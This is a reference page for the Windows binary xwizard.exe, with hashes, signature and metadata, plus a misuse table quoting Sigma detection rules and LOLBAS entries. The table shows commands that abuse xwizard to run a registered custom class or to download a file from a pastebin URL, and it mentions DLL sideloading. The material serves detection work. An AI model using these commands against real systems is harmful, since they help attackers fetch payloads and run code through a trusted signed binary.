xwizard.exe

  • File Path: C:\WINDOWS\system32\xwizard.exe
  • Description: Extensible Wizards Host Process

Hashes

Type Hash
MD5 30D89280E86DFB29C2F232194642125E
SHA1 1E437EB24F067A666ED911F40AB459943728752C
SHA256 E3AB3499ADD8BE055DF9741DA2DC5E21C6B00F9A8344999808FDDF48025DF031
SHA384 3C4AAD4D57720840FE01BE440538B988772137CB20CEAD4B9B1B9171F1B26CDC215E0096EA5488631E7F20AE68DD3B5D
SHA512 EE64AFF2EEF4B42FF1D8BD49E820D38265BCAACF400DABCF3C9E4682FBF7E2E0861616EB10A1DA8EBE637C0C8A4E335593201DCD84B5BF747EC90CF3709CDA6F
SSDEEP 1536:aQqwlcECPKwnjoF3bVnLVn3g3iBzndURDoq4OZZZLlCIib:aQqrHP9jib3TBznSRD68wb

Signature

  • Status: Signature verified.
  • Serial: 330000023241FB59996DCC4DFF000000000232
  • Thumbprint: FF82BC38E1DA5E596DF374C53E3617F7EDA36B06
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: xwizard.exe.mui
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.18362.1 (WinBuild.160101.0800)
  • Product Version: 10.0.18362.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

File Similarity (ssdeep match)

File Score
C:\Windows\system32\ComputerDefaults.exe 50
C:\WINDOWS\system32\ComputerDefaults.exe 50
C:\WINDOWS\system32\ComputerDefaults.exe 47
C:\Windows\system32\ComputerDefaults.exe 47
C:\windows\system32\ComputerDefaults.exe 52
C:\Windows\system32\ComputerDefaults.exe 43
C:\Windows\system32\xwizard.exe 55
C:\windows\system32\xwizard.exe 49
C:\Windows\system32\xwizard.exe 41
C:\WINDOWS\system32\xwizard.exe 44
C:\Windows\system32\xwizard.exe 47
C:\windows\SysWOW64\ComputerDefaults.exe 50
C:\WINDOWS\SysWOW64\ComputerDefaults.exe 44
C:\Windows\SysWOW64\ComputerDefaults.exe 54
C:\WINDOWS\SysWOW64\ComputerDefaults.exe 40
C:\Windows\SysWOW64\ComputerDefaults.exe 52
C:\Windows\SysWOW64\ComputerDefaults.exe 46
C:\WINDOWS\SysWOW64\xwizard.exe 46
C:\Windows\SysWOW64\xwizard.exe 50
C:\Windows\SysWOW64\xwizard.exe 49
C:\windows\SysWOW64\xwizard.exe 52
C:\Windows\SysWOW64\xwizard.exe 47
C:\WINDOWS\SysWOW64\xwizard.exe 55

Possible Misuse

The following table contains possible examples of xwizard.exe being misused. While xwizard.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma proc_creation_win_class_exec_xwizard.yml title: Custom Class Execution via Xwizard DRL 1.0
sigma proc_creation_win_class_exec_xwizard.yml description: Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties. DRL 1.0
sigma proc_creation_win_class_exec_xwizard.yml - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ DRL 1.0
sigma proc_creation_win_class_exec_xwizard.yml Image\|endswith: '\xwizard.exe' DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml title: Xwizard DLL Sideloading DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml description: Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml Image\|endswith: '\xwizard.exe' DRL 1.0
LOLBAS Xwizard.yml Name: Xwizard.exe  
LOLBAS Xwizard.yml - Command: xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}  
LOLBAS Xwizard.yml Description: Xwizard.exe running a custom class that has been added to the registry.  
LOLBAS Xwizard.yml - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}  
LOLBAS Xwizard.yml Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.  
LOLBAS Xwizard.yml - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM  
LOLBAS Xwizard.yml Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file.  
LOLBAS Xwizard.yml - Path: C:\Windows\System32\xwizard.exe  
LOLBAS Xwizard.yml - Path: C:\Windows\SysWOW64\xwizard.exe  

MIT License. Copyright (c) 2020-2021 Strontic.